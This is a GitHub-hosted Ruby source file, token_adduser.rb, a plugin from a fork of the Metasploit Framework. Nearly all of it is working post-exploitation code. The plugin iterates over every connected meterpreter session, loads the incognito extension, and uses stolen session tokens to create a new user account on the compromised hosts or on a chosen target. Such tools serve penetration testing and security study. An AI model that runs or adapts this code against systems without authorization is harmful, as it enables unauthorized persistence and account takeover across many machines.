forked from rapid7/metasploit-framework
-
Notifications
You must be signed in to change notification settings - Fork 0
/
token_adduser.rb
117 lines (95 loc) · 2.88 KB
/
token_adduser.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
#
# $Id$
#
# This is a modified version of token_hunter.rb. Credit to
# jduck (I believe) for much of the base code here.
#
# The goal of this script is to attempt to add a user via
# incognito using all connected meterpreter sessions.
#
# jseely[at]relaysecurity.com
#
# TODO: This should probably find new life as a post module.
module Msf
class Plugin::TokenAdduser < Msf::Plugin
class TokenCommandDispatcher
include Msf::Ui::Console::CommandDispatcher
def name
"Token Adduser"
end
def commands
{
'token_adduser' => "Attempt to add an account using all connected meterpreter session tokens"
}
end
def cmd_token_adduser(*args)
opts = Rex::Parser::Arguments.new(
"-h" => [ true, "Add account to host"],
)
# This is ugly.
if (args.length == 0)
print_line("Usage: token_adduser [options] <username> <password>")
print_line(opts.usage)
return
end
opt_user_pass = []
username = nil
password = nil
host = nil
opts.parse(args) do |opt, idx, val|
case opt
when "-h"
host = val
else
# Excuse my weak ruby skills. I'm sure there's a better way to get username and password
# from the args.
opt_user_pass << val
end
end
# Again, I'm sure there's a better way to do this.
username = opt_user_pass[0]
password = opt_user_pass[1]
tokens_del = {}
tokens_imp = {}
framework.sessions.each_key do |sid|
session = framework.sessions[sid]
next unless session.type == "meterpreter"
print_status(">> Opening session #{session.sid} / #{session.session_host}")
unless session.incognito
session.core.use("incognito")
end
unless session.incognito
print_status("!! Failed to load incognito on #{session.sid} / #{session.session_host}")
next
end
#print "DEBUG #{username} #{password}\n"
res = session.incognito.incognito_add_user(host,username,password)
if(res)
print "#{res}\n"
# Currently only stops on success if a user is trying to be added to a specific
# host. I can't think of a good reason to stop on success (or even make it an option)
# when trying to add a user to local sessions.
if (host)
if res =~ /\[\+\] Successfully|\[\-\] Password does not meet complexity requirements|\[\-\] User already exists/
break
end
end
end
end
end
end
def initialize(framework, opts)
super
add_console_dispatcher(TokenCommandDispatcher)
end
def cleanup
remove_console_dispatcher('Token Adduser')
end
def name
"token_adduser"
end
def desc
"Attempt to add an account using all connected meterpreter session tokens"
end
end
end